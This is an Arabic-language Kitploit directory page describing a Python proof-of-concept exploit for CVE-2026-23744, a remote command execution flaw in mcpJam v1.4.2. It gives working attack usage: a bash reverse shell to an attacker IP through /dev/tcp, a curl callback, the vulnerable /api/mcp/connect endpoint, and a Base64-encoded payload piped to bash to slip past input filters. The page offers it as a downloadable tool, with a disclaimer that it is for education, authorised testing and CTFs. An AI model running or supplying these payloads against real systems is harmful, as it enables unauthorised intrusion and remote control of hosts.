Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-poc — cve-2026-23744 python استغلال | Kitploit
أدوات/GitHubGitHub/keeieb79/cve-2026-23744-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubkeeieb79/cve-2026-23744-poc

CVE-2026-23744-poc

cve-2026-23744 python استغلال

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23744 — استغلال تنفيذ الأوامر عن بعد (RCE) في mcpJam

استغلال إثبات مفهوم بلغة Python 3 للثغرة CVE-2026-23744، وهي ثغرة تنفيذ أوامر اعتباطية تؤثر على mcpJam v1.4.2.

تقوم هذه الأداة بأتمتة توصيل الحمولة عن طريق ترميز الأوامر بتنسيق Base64 بشفافية قبل الإرسال، مما يساعد في تجاوز آليات التحقق الصارمة من الإدخال وتصفية الأحرف. يتم فك ترميز الحمولة وتنفيذها عبر غلاف /bin/bash على النظام الهدف.


الميزات

الترميز التلقائي للحمولة بتنسيق Base64

يتم ترميز الأوامر تلقائيًا قبل الإرسال، مما يحسن الموثوقية عند استهداف التطبيقات التي تفرض تحققًا صارمًا من الإدخال أو قيودًا على الأحرف.

تنفيذ الأوامر المرن

يدعم تنفيذ الأوامر الاعتباطية، بما في ذلك:

  • الصدى العكسي (sh, bash, nc, إلخ.)
  • تعداد النظام
  • اختبار الاتصال بالشبكة
  • توصيل الحمولة المخصصة
  • إخراج التصحيح المفصل

    يعرض:

    • حمولات طلب JSON المُنشأة
    • استجابات الخادم الأولية

    هذا يبسط استكشاف الأخطاء والتحقق من صحة الاستغلال.

    تجاوز التحقق من SSL

    يقوم بكتم تحذيرات التحقق من الشهادة، مما يسمح بالتفاعل مع الأهداف التي تستخدم شهادات SSL ذاتية التوقيع أو غير موثوقة.


    الاستخدام

    المتطلبات الأساسية

    قم بتثبيت الاعتماد المطلوب:

    root@kitploit:~
    pip install requests
    

    الصيغة

    root@kitploit:~
    python3 exploit.py <target_url> "<command>"
    

    أمثلة

    اختبار الاتصال

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
    

    الصدى العكسي

    root@kitploit:~
    python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
    

    التفاصيل التقنية

    يستهدف الاستغلال نقطة النهاية /api/mcp/connect عن طريق إنشاء كائن serverConfig خبيث.

    بدلاً من إرسال الأوامر مباشرة، يتم تحويل الحمولة إلى سلسلة مشفرة بتنسيق Base64 وتنفيذها عبر Bash:

    root@kitploit:~
    "args": [
        "-c",
        f"echo {base64_payload} | base64 -d | bash"
    ]
    

    يساعد هذا الأسلوب في تجنب التصفية على مستوى التطبيق مع ضمان فك ترميز الحمولة وتنفيذها بالكامل على المضيف الهدف.

    تدفق التنفيذ

    1. يتم ترميز الأمر المقدم من المستخدم بتنسيق Base64.
    2. يتم تضمين الحمولة المشفرة في طلب serverConfig.
    3. يقوم الخادم الهدف بفك ترميز الحمولة باستخدام base64 -d.
    4. يتم تمرير الأمر الذي تم فك ترميزه مباشرة إلى /bin/bash.
    5. يتم تنفيذ الأمر بصلاحيات عملية mcpJam الضعيفة.

    إخلاء مسؤولية

    [!WARNING] يتم توفير هذا المشروع لأغراض تعليمية فقط، وتقييمات الأمن المصرح بها، وبيئات Capture The Flag (CTF).

    الاستخدام غير المصرح به ضد أنظمة ليس لديك إذن صريح لها غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن أي سوء استخدام أو أضرار أو عواقب قانونية ناتجة عن استخدام هذا البرنامج.

    تنزيل الأداة